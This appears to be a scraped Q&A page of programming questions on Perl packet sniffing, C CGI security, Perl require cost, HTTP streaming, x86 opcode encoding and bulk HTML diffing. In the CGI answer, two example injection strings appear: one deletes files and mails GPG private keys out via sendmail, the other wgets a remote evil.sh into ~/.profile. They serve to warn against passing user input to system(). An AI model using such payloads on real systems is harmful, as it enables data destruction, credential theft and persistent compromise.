Perl network frame/packet parser - perl

I am writing a small sniffer as part of a personal project. I am using Net::Pcap (really really great tool).
In the packet-processing loop I am using the excellent Net::Frame for unpacking all the headers and getting at the data. I am getting concerned that this might not be terribly efficient (Net::Frame is great but seems to be more than I need for this project).
Also I dislike that for some Debian systems I had to manually compile libdumbnet (the package provided in the official apt repositories didn't seem to work, Net-Libdnet-0.92 didn't like it).
All I want is to get at the payload inside a TCP segment. Is there any alternative ?
Thank you.
P.S. Would it be really really bad (read "thedailywtf.com worthy") if I just took the packet and searched it for some pattern ?

I recently wrote a PCAP dump file unpacker in C and then afterwards wished I'd just used the open source libraries instead (when I realised they existed and were so easy to use). I have to say that as it's a binary file format it's probably easier to do in C than Perl, but I'll no doubt get boo'ed by all the Perl fanatics out there.
What I will say is that using existing code will be quicker all round than coding it yourself, but if you really really want to, the file format is freely available online and is really quite simple.
As for searching for a pattern, it almost certainly won't work. It's a binary file format and the packets can be fragmented and/or duplicated, so the only reliable way to know where a message starts and ends is by unpacking the headers, checking the packet flags, reading the content length field, etc. etc. Doing pattern searches may work 90% of the time, but at some point you'll find a packet capture log that means you need to change your code. And then a while later find another packet that means another change, and so on and so forth.

Related

Is running a C/C++ CGI script on Apache dangerous?

I am currently programming my own little website system (a script that compiles Markdown documents, and puts them in appropriate locations, thus making a quick, static website).
I would like to enable people who go to my (initially static) contact page, to send me a GnuPG-encrypted message.
Basically, the visitor writes his or her message in a contact form, clicks this checkbox if they want the message to be encrypted, and upon receiving the form, a C(?) program of mine calls system("gpg --encrypt --recipient 31A49121CD42FF00 --armor <the_message>");
(I have yet to determine how to effectively get the message contents and use it in a command without writing the unencrypted message to disk).
Is it (un)secure to use exec() in a self-made C program that processes form data? Is there a simpler way to achieve what I want to do (using a standalone script—because my website is static—to run GPG)? Any security considerations I haven’t thought about?
I am asking on here instead of Security SE because I am looking for answers with developers’ points of view.
As a security professional who makes at least a modest living consulting on the subject, and a rather prolific C programmer I can give you a few different thoughts on the subject.
When you are considering security of processes executing on your target, you have to consider a number of things and how someone may abuse the situation.
A glimpse
Let's look at the immediate security problem that I see just off hand, you are using the "system()" call directly on <the_message> ; Can you imagine the following:
the_message="hello and goodbye; rm -rf *; cat $HOME/.gpg/* | /usr/bin/sendmail -s 'these are the private keys' temporary_account#hotmail.com" or worse;
the_message="hello and goodbye; wget http://some.remote.system.com/evil.sh && mv evil.sh ~/.profile;"
So the first thing to do is never use anything provided by a user as a command or part of a command-line; save the message to a temporary text file and encrypt that;
A slightly deeper look
Okay so what's going on in terms of using C; Before I give you the answer, I would like to say I love C; I almost exclusively program in C and have been a professional developer with main focus on C for last 24 years. Now, I would like to say that C is a horrid tool for writing a CGI program in, and you should only do it if you have a truly compelling reason. And after you find that reason, you should discard it anyways and abandon the thought.
Here are some reasons why you SHOULDN'T use C for a CGI interface.
CGI/1.1 is an ugly standard; It uses environment variables, stdin, and all sorts of character remapping and recoding just to get data across. You are invariably going to have to deal with either implementing a cgi interface or using libcgi or some equivalent library in order to deal with all the permutations, and at the end you'll just hate yourself for it.
When I used http://libcgi.sourceforge.net for a particular project I had to debug and harden and augment it because it had some horrible buffer over flow issues left right and center, non-existant utf-8 support and limited control over authentication.
But even if you have that covered, C is generally a bad idea because a lot of the security issues arise out of the manual manipulation of memory that one has to do.
A higher level language (shell script, awk, perl, php etc.) is a much better tool to handle CGI; Perl was almost built for it, and PHP was specially built for it. Another advantage of using perl or PHP in your situation is that GnuPG modules are available so that you don't have to system() anything;
The key to good development is to use the easiest, most straightforward toolkit for the job; In your case I think you should NOT use C, as it would force you to do things that are already very well done for you in form of a proper CGI processing language such as PHP.
Those are my thoughts; I hope that you will

How expensive is: require "foo.pl";

I'm about to rewrite a large portion of a project that I have developed over the last 10years while learning perl. There is alot of optimisation that can be gained.
A key part of the code is a large if/elsif block that require xxx.cgi files depending on a POST value. Eg:
if($FORM{'action'} eq "1"){require "1.cgi";}
elsif($FORM{'action'} eq "2"){require "2.cgi";}
elsif($FORM{'action'} eq "3"){require "3.cgi";}
elsif($FORM{'action'} eq "4"){require "4.cgi";}
It has many more irritations but just how expensive is using "require" in perl?
require itself has a relatively low cost in any case and, if you require the same file more than once within a single run of your program, it will detect that the file has already been loaded and not attempt to load it a second time. However, if you have a long and highly-populated search path (#INC) and you require (or use) a lot of files, it's possible that all of the directory searches could add up; this isn't common (and doesn't sound likely in your case), but it can be improved by reorganizing your module directories so that the things you're loading show up earlier in #INC.
The potentially-major performance hit referred to by earlier answers is the cost of compiling the code in the files you require. Getting rid of the require by moving the code into your main program will not help with this, as the code will still need to be compiled. In your case, it would probably make things worse, as it would cause the code for all options to be compiled on every one rather than only compiling the code used by the one action selected by the user.
As has been said, it really depends on the actual code in those files. Your best bet would be to do tests using Devel::NYTProf and/or Benchmark to see where the most time is being spent in your code if you are unhappy with its performance.
You can also read Profiling Perl on perl.com, but it is a bit outdated as it uses Devel::DProf.
Not answer to your primary question, but still a good idea for code refactor i read recently in Ovid blog.
The first time, possibly expensive; Perl has to search a path to find the file and load it up. Subsequent times, it's cheap -- a table is consulted and the file isn't actually loaded a second time. If this is in a CGI that is run once per request and then exited, then this is not too good.
It's really going to depend on the size of the files you're calling to. If you have massive CGI files, then it might detriment the performance of your software. If we're talking 6 or 7 lines of code each, then no issue. Try benchmarking your program's performance with and without, and make your own judgement.

Are there any HTTP connection iterators in Perl?

I'm trying to parse results from queries over HTTP that can return up to millions of lines - where each line need to be parsed. Ideally I would love to read a line at a time from a connection and parse it as I go - so basically a FileHandle-esque iterator, but the existing HTTP libraries all seem to fetch all content at once, although one can a) save to a file, or b) process chunks using a code ref. A is not ideal as it is a two-pass solution (the file would need to be read line by line after the data is transmitted, and it would take up storage, perhaps unnecessarily). B is not ideal as would like to be able to return each line, rather than handle it in a code ref, and moreover a chunk is not a line, so that LWP solution does not benefit from LWP line reconstitution. I know there are non-blocking solutions (using AnyEvent and Coro) but these seem more interested in non-blocking-ness rather than line-by-line processing. Can anyone point me in a good direction here, or am I barking up the wrong tree?
The callback lets you do anything that you want. You could make it so you buffer the input as you get it and read lines from the buffer. Perl lets you open filehandles on just about anything (using tie), including strings (with open). Anything else you might find is ultimately going to receive a chunk and turn it into lines anyway.
Take a look at the accepted answer on What is the easiest way in pure Perl to stream from another HTTP resource? I haven't used HTTP::Lite myself, but it appears that it supports callback-based handling of received data, so that should work for you.

Is there some kind of tool to look at the encoding of Intel x86 instructions?

Forgive me if this might be a dumb question but, I'm in an assembly class that was mostly taught using an emulated CPU that was supposed to teach the concepts of assembly code. We haven't even written an Intel program, so I'm trying to adjust. In our emulated CPU, we were able to generate a symbol table file that gave the bytes equivalent for instructions:
http://imgur.com/tw5S8.png
Would I be able to do such a thing with Intel x86 instructions?
Try IDA. It has an option to show binary values of opcodes.
EDIT: Well.. it's a disassembler. Try opening a binary file, and set the number of opcode bytes to show (in Options/General/) to something that is not zero.
If you are looking for an IDE that shows you in real time the opcodes for the instruction you've used, then I don't think you'll find one, because of lack of "market". Can you explain why you need it? Do you want to know just their length, or want to learn them? There is simple pattern for lengths, so by dissasembling many binaries you'll catch it. If it's the opcodes you want.. well, there are lots of them, almost no rules, and practically no use to do it.
I see.. then you have to generate the list file . Your assembler should have an option for that. (for NASM it's -l listfile). Just put any instruction(s) in your .asm file, and generate listing for it. It should contain the binary encoding for each instruction.
First, get Intel Instruction Set Refference, or, better, this link: http://siyobik.info/index.php?module=x86 . There you'll find that most opcodes have several encodings. In your particular case, the bit 1 of the opcode specifies direction, and since both operands are registers, you can toggle the direction and swap the register codes, and the result will be the same. Usually you have this freedom on most register to register arithmetic operations. To check this, try decompiling with IDA this source file:
db 02h, E0h
db 00h, C4h
There is a demo program shipped with fasm.dll which has an editor and hex-viewer:

Tool to compare/diff HTML in bulk

I have a lot of HTML files (10,000's and GBs worth) scraped from a server and I want to check to make sure the server produces the same results after some modifications but ignore kinds of differences that don't matter, e.g. whitespace, missing newlines, timestamps, small changes in some kinds of number, etc.
Does anyone know of a tool for doing this? I'd really rather not do more filtering than I have to.
(Oh and it needs to run under linux)
You might consider using a clone detector such as our CloneDR. This tool parses large sets of computer program (HTML is special case) files, builds abstract syntax trees representing the essential structure of each files, and compares programs for similarity.
Because it is comparing essential program structure, it ignores inessential differences such as comments and whitespace, and deterimines that two code segments are either identical or one can be obtained from the other by substituting other blocks of code. The latter allows the recognition of code that has been modified in various ways. You can see samples of clone detection runs on a variety of computer languages at the web site.
In your case, what you would be looking for are files in system A which are essentially clones (exact or near misses) of files in system B. As a general rule, if a file a is a variant of file b (e.g., with a few changes) the CloneDr will report it as a clone and show the exact differences.
At the scale of 20,000 files, I can see why you want a tool, and I can see why you want near-miss matches rather than exact matches.
Doesn't run under Linux, but I assume your problem is hard to enough to solve so that isn't what you are optimizing.
I use winmerge alot in windows and from what i can see some people enjoy meld in linux, so perhaps that could do the trick for you
http://meld.sourceforge.net/
Other examples i saw from a quick googling was Kompare,xxdiff.sourceforge.net, and kdiff3.sourceforge.net
(could only post 1 link so wrote the adresses to xxdiff and kdiff3 as text)
Beyond Compare is purchased software that is actually worth the money (I never thought I'd hear myself typing that!). It is GUI based but handles thousands of files very well. It will allow you to specify unimportant changes with regular expressions as well as whitespace (beginning, middle and end of line). The feature set is very extensive, check out a trial download.
I do not work for this company, I just use Beyond Compare every day at work and enjoy it every time!